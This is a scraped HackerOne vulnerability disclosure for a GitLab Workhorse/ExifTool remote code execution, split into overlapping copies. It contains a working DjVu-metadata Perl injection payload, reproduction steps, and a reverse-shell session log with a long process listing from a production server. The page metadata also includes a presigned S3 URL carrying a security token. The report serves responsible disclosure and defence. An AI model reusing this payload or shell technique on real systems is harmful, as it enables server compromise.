cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T17:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T17:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T17:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQW2KWPABZ%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T172946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIF6gckk99%2FOGc18TH5DN6MbsUpuY9en%2FG4cIoLn%2FyoiVAiEA9lCot1oxd67X9kndpistCGPt2WcbJ74LsZZdNC0j1nsq%2BgMIGhACGgwwMTM2MTkyNzQ4NDkiDP90Px2WAjEpV4vWLirXA0Mg5JXwN1Wik1%2Bd9heu7C8QVS%2FWri4jIS6ibx95m3BpmWHxbVNgPYWr%2BDMcXqS8lGA%2FejEtjH3SD8I83RDyXPftcXYobPkAz3XSW%2FEFcafUzGnpN68i4%2FgwfdH%2BxqOK5LjyOokgGJRiFuCU1Pwie09M%2BV%2F92SU%2BGsCeDc%2BJF6SKGoW3iIgW0%2FhCAf%2FGRJbr2krDdmor0GE0x5nZ5ydY4GUXWtkjcZ53G5ZPmu3RmEhn5F7tOlmSwwUF3%2Bzd2QB%2B9X9mn1pJEGoQx4sXyFWrND5%2F2k9tx7O7vzuU8rNDXixip5VwtHjmpIQWmn5tqNdXNd0LHKjo8CBGg0G%2BtCb353ZiCI9utzXdTcqY2elMo%2BLksZ3k04rqmDqwQ%2FskmGZC5qqVpAS2IFBRTa0O6sJ9gK17FLfTooX9HKfLEhbtdP7rsUkwMLgoKYo6lsYGyx2VTMEl4V2tB7HodgDgYsQXP47Ci4osfVcBP2kmxBtDw%2F40QSJZi3haf9J9U0xA41T%2FpT1DowNzvcgzFi%2FcM6iejfBxRWl9FC9IwWNTpga1blC%2FzH0qJzVEwvYC6did9S5N5KqgbQmtsksVJ%2BU1sxIBC7lEMmRyN5LmupErqOZ%2Becv21%2FznZxgWbjC96v%2BEBjqlAYIFaSJRMsTJCYlp%2BE9i3yK9HcN%2B6a48cUOrfwxNstpLKeQDgnPXR%2FG5aERjHOQNdGrxbu7S7HTHZpc7jgQc40GhWubkQSU8J3202MMZ4VqBssWN4H%2FhFNzK82Ok7dEoQl9wQ3HOHbfMwrngzM5Jx%2BWsdNq2Q8JuD5A8I%2FXHpm9HVRcYDzs5YKkkfBs9UV4AmPBNkrx74xUo1EaTMFklmdhEnfrMWA%3D%3D&X-Amz-Signature=76979bc5806d554785a6a80fb93b6ae7c41dd9cdd4d0d207e0376d5d09793ced"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T17:29:46", "differentElements": ["h1reporter"], "edition": 22}, {"bulletin": {"id": "H1:1154542", "hash": "3f57b6cc5941174e00d99bd8500c5de6", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 